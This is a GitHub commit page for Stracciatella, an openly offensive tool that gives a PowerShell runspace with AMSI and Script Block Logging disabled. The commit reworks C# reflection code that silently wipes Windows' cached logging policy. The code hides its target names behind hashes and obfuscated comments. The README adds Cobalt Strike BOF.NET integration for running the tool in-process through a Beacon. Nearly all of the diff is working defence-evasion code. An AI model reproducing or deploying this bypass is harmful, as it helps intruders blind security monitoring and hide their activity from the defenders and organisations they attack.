Skip to content

Commit

Permalink
fixed issues/4 with ineffective Script Block Logging
Browse files Browse the repository at this point in the history
  • Loading branch information
@mgeeky
mgeeky committed May 17, 2022
1 parent 29f3a86 commit b54a795
Show file tree
Hide file tree
Showing 8 changed files with 29,742 additions and 3,470 deletions.
18 changes: 18 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -233,6 +233,24 @@ The associated aggressor script leverages internal Beacon routines to write to a

Sometimes we have Powershell scripts that do not expose any function or reflectively load .NET modules that we would like to invoke from a Powershell runtime. To facilitate that use case, the `stracciatella-script <scriptpath> <command` Beacon command can be used. It reads specified powershell script file and appends given `<command>` separated by semicolon to that script.

### BOF.NET support

Stracciatella's Aggressor script (CNA) detects whether there is BOF.NET loaded and if so, exposes a command:

`bofnet_loadstracciatella`

That issues `bofnet_load stracciatella.exe`. Additionally, Stracciatella will then run through `bofnet_jobassembly` instead of Cobalt's builtin `execute-assembly`.

That behaviour is adjustable by changing global variable in `stracciatella.cna` script:

```perl
#
# If there's BOF.NET loaded in Cobalt Strike, prefer `bofnet_jobassembly` command over `execute-assembly`.
# This is useful when we want to switch our tactics to running inline/in-process via BOF.NET instead of fork & run.
#
$FAVOR_BOFNET_INSTEAD_OF_EXECUTE_ASSEMBLY = "true";
```


## How do you disable AMSI & Script Block logging?

Expand Down
Binary file modified Stracciatella.exe
View file
Binary file not shown.
32,898 changes: 29,537 additions & 3,361 deletions Stracciatella/ClmEmbeddedFiles.cs
View file

Large diffs are not rendered by default.

165 changes: 73 additions & 92 deletions Stracciatella/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,6 +12,7 @@
using System.IO.Pipes;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Collections;

namespace Stracciatella
{
Expand Down Expand Up @@ -69,8 +70,8 @@ private static void PrintBanner()
{
Console.WriteLine("");
Console.WriteLine(" :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.");
Console.WriteLine(" Mariusz Banach / mgeeky, '19-21 <mb@binary-offensive.com>");
Console.WriteLine(" v0.5");
Console.WriteLine(" Mariusz Banach / mgeeky, '19-22 <mb@binary-offensive.com>");
Console.WriteLine(" v0.6");
Console.WriteLine("");
}

Expand Down Expand Up @@ -224,6 +225,24 @@ private static Options ParseOptions(string[] args)
processed.Add(args[i + 1]);
i += 1;
}
else if (string.Equals(arg, "-l") || string.Equals(arg, "--label"))
{
//
// Undocumented parameter "label".
// Used only to satisfy BOF.NET bofnet_jobs output displaying executed assembly's Args.
// Not to be used directly. Does nothing.
//

if (args.Length - 1 < i + 1)
{
throw new ArgumentException("No value for label.");
}

processed.Add(arg);
processed.Add(args[i + 1]);
processedopts += 2;
i += 1;
}
}

if (processedopts < args.Length )
Expand Down Expand Up @@ -436,56 +455,21 @@ public static bool DisableAmsiTechnique2(PowerShell rs)

public static bool DisableScriptLogging(PowerShell rs)
{
bool ret = false;
string param = "";
ret |= DisableScriptLoggingTechnique1(rs, ref param);
ret |= DisableScriptLoggingTechnique2(rs, param);
return ret;
}

public static bool DisableScriptLoggingTechnique1(PowerShell rs, ref string param)
{
AppDomain currentDomain = AppDomain.CurrentDomain;
Assembly[] assems = currentDomain.GetAssemblies();

foreach (Assembly assem in assems)
try
{
if (assem.GlobalAssemblyCache && GetHash(assem.Location.Split('\\').Last()) == 65764965518) // SysXtem.ManaXgement.AutomaXtion.dll
{
Type[] types = assem.GetTypes();
foreach (var tp in types)
{
if (GetHash(tp.Name) == 12579468197) // UXtils
{
var fields = tp.GetFields(BindingFlags.NonPublic | BindingFlags.Static);
foreach (var f in fields)
{
if (GetHash(f.Name) == 12250760746)
{
HashSet<string> names = (HashSet<string>)f.GetValue(null);
foreach (var n in names)
{
if (GetHash(n) == 32086076268) // ScrXiptBloXckLogXging
{
param = n;
break;
}
}

// https://cobXXXbr.io/ScrXXXiptBlock-Warning-Event-Logging-BypXXXass.html
f.SetValue(null, new HashSet<string>(StringComparer.OrdinalIgnoreCase) { });
return true;
}
}
}
}
}
bool ret = false;
ret |= DisableScriptLoggingTechnique1(rs);
return ret;
}
catch (Exception e)
{
Console.WriteLine($"[!] Could not disable Script Block Logging. Unhandled exception occured:\n{e}");
return false;
}

return false;
}

public static bool DisableScriptLoggingTechnique2(PowerShell rs, string param)

public static bool DisableScriptLoggingTechnique1(PowerShell rs)
{
AppDomain currentDomain = AppDomain.CurrentDomain;
Assembly[] assems = currentDomain.GetAssemblies();
Expand All @@ -495,67 +479,55 @@ public static bool DisableScriptLoggingTechnique2(PowerShell rs, string param)
if (assem.GlobalAssemblyCache && GetHash(assem.Location.Split('\\').Last()) == 65764965518) // SysXtem.ManaXgement.AutomaXtion.dll
{
Type[] types = assem.GetTypes();
string key = "";
string param = "";

foreach (var tp in types)
{
if (GetHash(tp.Name) == 12579468197) // UXtils
// 12579468197 - ScriXptBloXck
if (GetHash(tp.Name) == 4572158998) // UXtils
{
var fields = tp.GetFields(BindingFlags.NonPublic | BindingFlags.Static);
FieldInfo field = null;
foreach (var f in fields)
{
if (GetHash(f.Name) == 52485150955) // caXchedGrXoupPoXlicySettXings
if (GetHash(f.Name) == 52485150955) // cachXedGrXoupPoXlicySetXtings
{
field = f;
break;
}
}
var cached = (System.Collections.Concurrent.ConcurrentDictionary<string, System.Collections.Generic.Dictionary<string, object>>)f.GetValue(null);

if(field != null)
{
Dictionary<string, object> cached = (Dictionary<string, object>)field.GetValue(null);
string key = param;

if (key.Length == 0)
{
foreach (string k in cached.Keys)
foreach (string n in cached.Keys)
{
if (GetHash(k) == 32086076268) // ScrXiptBloXckLogXging
string val = n;
if (val.Contains("\\"))
{
key = k;
break;
var pos = val.LastIndexOf("\\");
if (pos > 0 && pos + 1 < val.Length)
{
val = val.Substring(pos + 1);
}
}
}
}

if(key.Length > 0 && cached[key] != null)
{
Dictionary<string, object> cached2 = (Dictionary<string, object>)cached[key];
string k2 = "";
string k3 = "";

foreach (string k in cached2.Keys)
{
if (GetHash(k) == 45083803091) // EnabXleScrXiptBloXckLogXging
{
k2 = k;
}
else if (GetHash(k) == 70211596397) // EnabXleScrXiptBloXckInvocXationLogXging
if (GetHash(val) == 32086076268) // ScrXiptBloXckLogXging
{
k3 = k;
}
}
param = val;
key = n;

if (k2.Length > 0 && cached2[k2] != null) cached2[k2] = 0;
if (k3.Length > 0 && cached2[k3] != null) cached2[k3] = 0;
}
if (key.Length > 0 && cached[key] != null)
{
var cached2 = new System.Collections.Generic.Dictionary<string, object>();

cached2[$"Enable{param}"] = 0;
cached2[$"Enable{param.Replace("kL", "kInvocationL")}"] = 0;

var newCache = new Dictionary<string, object>();
newCache.Add($"Enable{param}", 0);
string param2 = param.Replace("kL", "kInvocationL");
newCache.Add($"Enable{param2}", 0);
cached[$"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\{param}"] = newCache;
cached[key] = cached2;

return true;
f.SetValue(null, cached);
}

return true;
}
}
}
}
}
}
Expand Down Expand Up @@ -676,6 +648,13 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost

if(!silent) Info($"PS> {command}");

if (command.Length == 0)
{
if(!silent) Info($"(no command given)");
return "";
}

//pipe.Commands.AddScript("& { " + command + "} *>&1");
pipe.Commands.AddScript(command);
pipe.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
if(addOutDefault) pipe.Commands.Add("Out-default");
Expand All @@ -686,6 +665,7 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost

output = ((CustomPSHostUserInterface)host.UI).Output;
((CustomPSHostUserInterface)host.UI)._sb = new StringBuilder();

command = "";
}
catch (Exception e)
Expand All @@ -694,6 +674,7 @@ public static string ExecuteCommand(string command, PowerShell rs, CustomPSHost
}
}
}

return output;
}

Expand Down
5 changes: 3 additions & 2 deletions Stracciatella/Stracciatella.csproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -65,6 +65,7 @@
<None Include="FodyWeavers.xsd">
<SubType>Designer</SubType>
</None>
<None Include="packages.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<PropertyGroup>
Expand All @@ -74,12 +75,12 @@
<PreBuildEvent>powershell.exe -File "$(SolutionDir)Stracciatella\Out-CSharpDataClass.ps1" -SolutionDir "$(SolutionDir)." -Target1 "$(SolutionDir)ClmDisableAssembly\bin\$(ConfigurationName)\ClmDisableAssembly.dll" -Target2 "$(SolutionDir)ClmDisableDll\ClmDisableDll.dll" -Verbose</PreBuildEvent>
</PropertyGroup>
<Import Project="VersionSpecificSymbols.prop" />
<Import Project="..\packages\Fody.6.3.0\build\Fody.targets" Condition="Exists('..\packages\Fody.6.3.0\build\Fody.targets')" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\packages\Fody.6.3.0\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.3.0\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\Fody.6.6.1\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.6.1\build\Fody.targets'))" />
<Error Condition="!Exists('..\packages\PropertyChanged.Fody.3.2.10\build\PropertyChanged.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\PropertyChanged.Fody.3.2.10\build\PropertyChanged.Fody.props'))" />
</Target>
<Import Project="..\packages\Fody.6.6.1\build\Fody.targets" Condition="Exists('..\packages\Fody.6.6.1\build\Fody.targets')" />
</Project>
2 changes: 1 addition & 1 deletion Stracciatella/Stracciatella.csproj.user
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>-v -p stracciatellapipe -x 147 -e -t 0</StartArguments>
<StartArguments>whoami</StartArguments>
</PropertyGroup>
</Project>
12 changes: 3 additions & 9 deletions Stracciatella/packages.config
View file
Original file line number Diff line number Diff line change
@@ -1,9 +1,8 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="Fody" version="6.3.0" targetFramework="net45" developmentDependency="true" />
<package id="Microsoft.NETCore.Platforms" version="1.1.0" targetFramework="net45" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net45" />
<package id="PropertyChanged.Fody" version="3.2.10" targetFramework="net45" />
<package id="Fody" version="6.6.1" targetFramework="net40" developmentDependency="true" />
<package id="NETStandard.Library" version="1.6.1" targetFramework="net40" />
<package id="PropertyChanged.Fody" version="3.2.10" targetFramework="net40" />
<package id="System.Collections" version="4.3.0" targetFramework="net45" />
<package id="System.Collections.Concurrent" version="4.3.0" targetFramework="net45" />
<package id="System.Diagnostics.Debug" version="4.3.0" targetFramework="net45" />
Expand All @@ -15,22 +14,17 @@
<package id="System.Linq" version="4.3.0" targetFramework="net45" />
<package id="System.Linq.Expressions" version="4.3.0" targetFramework="net45" />
<package id="System.Net.Http" version="4.3.4" targetFramework="net45" />
<package id="System.Net.Primitives" version="4.3.0" targetFramework="net45" />
<package id="System.ObjectModel" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Reflection.Primitives" version="4.3.0" targetFramework="net45" />
<package id="System.Resources.ResourceManager" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.InteropServices" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.InteropServices.RuntimeInformation" version="4.3.0" targetFramework="net45" />
<package id="System.Runtime.Numerics" version="4.3.0" targetFramework="net45" />
<package id="System.Text.Encoding" version="4.3.0" targetFramework="net45" />
<package id="System.Text.Encoding.Extensions" version="4.3.0" targetFramework="net45" />
<package id="System.Text.RegularExpressions" version="4.3.0" targetFramework="net45" />
<package id="System.Threading" version="4.3.0" targetFramework="net45" />
<package id="System.Threading.Tasks" version="4.3.0" targetFramework="net45" />
<package id="System.Xml.ReaderWriter" version="4.3.0" targetFramework="net45" />
<package id="System.Xml.XDocument" version="4.3.0" targetFramework="net45" />
</packages>
Loading

0 comments on commit b54a795

Please sign in to comment.